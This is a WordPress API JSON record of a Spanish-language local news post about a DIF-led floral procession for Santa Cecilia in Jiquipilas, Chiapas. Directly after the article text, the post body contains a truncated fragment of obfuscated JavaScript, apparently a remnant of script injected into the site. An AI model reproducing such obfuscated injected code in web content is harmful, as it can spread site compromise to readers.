{"id":12822,"date":"2023-11-23T05:09:16","date_gmt":"2023-11-23T05:09:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12822"},"modified":"2023-11-23T05:09:16","modified_gmt":"2023-11-23T05:09:16","slug":"madely-montejo-lleva-ofrenda-floral-a-la-virgen-de-santa-cecilia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12822","title":{"rendered":"Madely Montejo lleva ofrenda floral a la Virgen de Santa Cecilia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700716114199-1024x768.jpg\" alt=\"\" class=\"wp-image-12823\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700716114199-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700716114199-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700716114199-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1700716114199.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> OFICIAL.22 de noviembre del 2023. Jiquipilas, Chiapas. \u2013 La Presidenta del sistema DIF Madely Montejo Maza encabez\u00f3 una peregrinaci\u00f3n con ofrendas florales para la Virgen de Santa Cecilia acompa\u00f1ada de personal de este organismo p\u00fablico resaltando con respeto las tradiciones religiosas.Recorrieron alegremente varias calles con m\u00fasica y danzantes que hicieron m\u00e1s colorido el trayecto hasta la iglesia donde los fieles cat\u00f3licos veneran a la Virgen. \u201cEstamos muy contentos de poder participar en estas bellas tradiciones de nuestro pueblo y desde luego que lo hacemos con mucho gusto desde el DIF Municipal\u201d, dijo Madely Montejo.Y es que, adem\u00e1s, comento la primera dama que esta alegr\u00eda forma parte tambi\u00e9n de esta fecha por ser d\u00eda de los m\u00fasicos, ya que la Unesco estableci\u00f3 que el 22 de noviembre se celebre internacionalmente en honor a Santa Cecilia, a quien el papa Gregorio XIII nombr\u00f3 como la Patrona de los M\u00fasicos en 1584, por lo que felicit\u00f3 a todos los jiquipitlecos que forman parte de las agrupaciones musicales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>OFICIAL.22 de noviembre del 2023. Jiquipilas, Chiapas. \u2013 La Presidenta del sistema DIF Madely Montejo Maza encabez\u00f3 una peregrinaci\u00f3n con ofrendas florales para la Virgen de Santa Cecilia acompa\u00f1ada de personal de este organismo p\u00fablico resaltando con respeto las tradiciones religiosas.Recorrieron alegremente varias calles con m\u00fasica y danzantes que hicieron m\u00e1s colorido el trayecto hasta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12823,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12822","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12822","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12822"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12822\/revisions"}],"predecessor-version":[{"id":12824,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12822\/revisions\/12824"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12823"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12822"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12822"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12822"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}